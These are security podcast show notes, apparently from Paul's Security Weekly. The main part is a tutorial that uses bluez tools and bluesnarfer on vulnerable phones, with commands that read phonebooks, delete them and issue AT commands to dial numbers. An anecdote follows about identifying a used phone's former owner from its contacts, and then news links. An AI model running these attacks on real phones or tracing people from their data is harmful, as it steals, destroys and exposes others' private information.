Episode 63

From Paul's Security Weekly


Scanning for bluetooth and total pwnage with Bluesnarfer

First off, you are going to want to install the bluez libraries and bluez utilities for your Linux distro of choice. Or use Backtrack...

Plug in that USB adaptor! The USB dongle of choice that we use is the Linksys USBT100 - it is a class one device that can operate up to 100 meters, and it is hackable for an external antenna. You can buy them pre-modded from Wardrivingworld.com

Most installations will automatically start up the bluetooth adaptor as the hci0 interface. We can verify this with one of the bluez tools, hciconfig. Run without any other command line options, hciconfig shows info on all of our bluetooth adaptors. If hci0 isn't up, we can bring it up with hciconfig hci0 up.

Verify bluetooth devices exist in your environment with hcitool, another bluez utility. Use hcitool scan, and it will return all of the discoverable BT devices with their btaddr (the Bluetooth MAC address). Success? Sweet.

btscanner can be used to scan as well, and obtain info in a format that is a little easier to use. You'll need to download and compile btscanner - we found that with the Linksys USBT100 btscanner works best when started with the --no-reset option. This prevents btscanner from resetting the device before starting. Once started, btscanner will scan for discoverable devices with the i command - b will perform a brute-force scan, probing all possible BT btaddrs!

Bluescanner for win32! Won't work with the default Widcomm drivers though.

hcitool can also be used to obtain much of the same info as btscanner :-)

Got a vulnerable phone? btscanner will compare the btaddr to a database and list the attacks possible - mostly snarf attacks. The database is limited, so test what you discover in your environment.
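A small inventory helper, added here and not part of the show notes: it parses the text hcitool scan prints ("Scanning ..." then one tab-separated btaddr/name line per discoverable device) and reports any discoverable device in your environment that is not on an approved list. SAMPLE_SCAN and SAMPLE_INVENTORY are constructed values; scan_live() assumes bluez's hcitool is on the PATH with hci0 up.

```python
"""Inventory discoverable Bluetooth devices from `hcitool scan` output."""
from __future__ import annotations

import re
import subprocess
from dataclasses import dataclass

# A btaddr is six hex octets separated by colons.
BTADDR_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


@dataclass(frozen=True)
class Device:
    addr: str  # btaddr as printed by hcitool, upper-cased
    name: str  # friendly name the device advertised (may be empty)


def parse_hcitool_scan(output: str) -> list[Device]:
    """Parse `hcitool scan` text: a 'Scanning ...' banner followed by
    one '<btaddr>\\t<name>' line per discoverable device."""
    devices: list[Device] = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Scanning"):
            continue
        parts = line.split("\t", 1)
        addr = parts[0].strip().upper()
        if not BTADDR_RE.match(addr):
            continue  # not an address line; ignore it
        name = parts[1].strip() if len(parts) > 1 else ""
        devices.append(Device(addr, name))
    return devices


def unknown_devices(devices: list[Device], inventory: set[str]) -> list[Device]:
    """Return the devices whose btaddr is not in the approved inventory."""
    approved = {a.upper() for a in inventory}
    return [d for d in devices if d.addr not in approved]


def scan_live() -> list[Device]:
    """Run the real `hcitool scan` (needs bluez and an up hci0) and parse it."""
    proc = subprocess.run(["hcitool", "scan"], capture_output=True, text=True, check=True)
    return parse_hcitool_scan(proc.stdout)


# Constructed sample (not a real capture) so the script runs offline.
SAMPLE_SCAN = "Scanning ...\n\t00:11:22:33:44:55\tNokia 6310i\n\tAA:BB:CC:DD:EE:FF\tLaptop\n"
SAMPLE_INVENTORY = {"aa:bb:cc:dd:ee:ff"}  # devices you expect to be discoverable

if __name__ == "__main__":
    for d in unknown_devices(parse_hcitool_scan(SAMPLE_SCAN), SAMPLE_INVENTORY):
        print(f"unapproved discoverable device: {d.addr} ({d.name!r})")
```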

Record the btaddr of the device vulnerable to the snarf attack so we can use it with bluesnarfer. One problem with the default install of bluesnarfer is that bluesnarfer.h expects the bluetooth device to be connected to /dev/bluetooth/rfcomm/<device ID> (likely 0). I've tried modifying the source to point to the default install without much success and chasing my tail. Modding the source also isn't possible on Backtrack, where bluesnarfer doesn't work either! Yes, I tried 2.0.

The solution with the default source code is really easy, and this works for Backtrack too. The problem is that the device nodes bluesnarfer needs are missing, so let's create them. As root, do:

mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

These nodes will not survive a reboot, so you may want to add them to startup, or create a script :-)

Once the nodes have been created, bluesnarfer will be happy. Let's use it.

In order to grab phonebook entries, we'll give bluesnarfer the -r switch followed by the range of phonebook entries we want, and the -b switch with the btaddr:

bluesnarfer -r 1-100 -b <btaddr>

Delete the phonebook? Sure!:

bluesnarfer -w 1-100 -b <btaddr>

Now the fun part. Custom AT commands. How about making the phone dial a number of our choice? We can issue AT commands to the vulnerable phones with the -c switch:

bluesnarfer -c 'ATDT5551212;' -b <btaddr>

Note that we have to properly quote the AT command (with single quotes), and include a semicolon as the trailing command character.

Cell Phone Information disclosure via Ebay

So, some other serious notes. Information disclosure here? Sure. What is also interesting is not only obtaining this information remotely, but also obtaining this information from a used phone on ebay.

I just picked up a used Nokia 6310i from ebay, and it conveniently came preloaded with an address book full of proper names and phone numbers with area codes. This was surprising, as I figured that the seller would have wiped the phone!

While at the local cell phone store obtaining a prepaid SIM card for the phone, I was also prompted by the phone for a keypad PIN lock. I told the nice lady that I bought the phone off of e-bay and didn't know it. She took it in the back and removed it for me. Neat! What if I had stolen the phone? Would the IMEI be in the system as stolen? Maybe, as she even had a problem registering the phone in their system...so she used HER IMEI on a totally different phone.

I also overheard the other nice lady at the cell phone store assisting a new customer who was getting a new phone. The nice lady told the customer to check her address book on the new phone, as all of her phone numbers should have been moved over to the new phone with the SIM card....but were they off the old phone? Who knows.

So, with this phone I obtained off of ebay, I was able to track down the person whom I believe the phone belonged to by researching the names and phone numbers of the individuals contained in the address book. I also had one other piece of tasty info - the startup screen was customized with "Frank's" name....

So, by doing some research, I was able to determine that "Frank" is a Certified Professional Landman - one who deals with land acquisitions for the petroleum industry. "Frank" has lots of contacts in the greater Dallas, TX area. And his office is in the same vicinity...

Stories for Discussion

Abusing TCP/IP Name Resolution in Windows - [Paul] -

top 59 most influential security experts of 2007 - [Paul] - Why aren't we on the list!??!?!?!?!?!!!!?

Dark Reading Room's 7 Steps to a safer Wifi - [Paul] - Good stuff! Heed the warning!

Enhanced RDP Security In Vista - [Paul] - Finally! One of my biggest pet peeves!!

Upgrade Your Shockwave Flash plugin - [Paul] - Sweet attack vector...

GoDaddy is evil since they dissed Fyodor - [Paul] - And they suffered a DoS attack... lololololol

Screenshots of a botnet - [Paul] - Botnets, yummy

Worst Captcha Ever! - [Paul] - funny..

Malware Analysis - [Paul] - Malware is evil, so evil.....

OpenBSD IPv6 Kernel Remote DoS or exploit - [Larry/Nick] - The guys at CORE Labs are at it again, and the OpenBSD folks appear to brush it off. We're OpenBSD, we're INVINCIBLE! :-) Nick - L...ol

Reverse Engineering Malware, Websense style - [Larry] - A great write-up on reverse engineering an unknown piece of malware. Delphi, yuck!

L33tUpl0ad - [Larry] - Another damned good idea from Irongeek. Found a tool that is awesome, but the author has disappeared, and so has the tool? Leet upload is a repository for all those tools that went missing.

VOIP threats to watch out for - [Larry] - I found this over at Hack in the Box, and gave it a read. Very good things to be aware of for VOIP installations, which you should be evaluating and testing (where do all of your secret conversations happen? Likely over the phone which you suspect is secure). L33Dawg even chimed in about the Tactical VOIP Toolkit, which I can't wait to get ahold of.

Fingerprint for WPA authentication - [Larry] - Sounds cool, but have fingerprint readers been that widely adopted to be ubiquitous? I think it might be a good idea, but destined to fail.

BlueLane protecting ur VMware VMs - [Larry] - Interesting, who would have thought that rogue VMs (or non-updated ones) would be a threat. Neat.

Root DNS server attacks...calling card? - [Larry] - Some interesting thoughts about the motivation for attacking the root DNS servers a few weeks ago. Maybe a show of force (look at my botnet, Ma!) by a botherder for a potential client?

Don't open that attachment... - [Larry] - ...even if you asked for it. Post a job ad online, get resumes. One of those resumes may be from a hacker with a nice PDF or Word exploit. Well, you asked for it!

Other Stories of Interest

Conference Media Pr0n - [Paul] - Blackhat videos are funny...

Federal Agencies Ban Vista - [Larry] - Not really for security reasons. I don't even think that they got that far in the evaluation.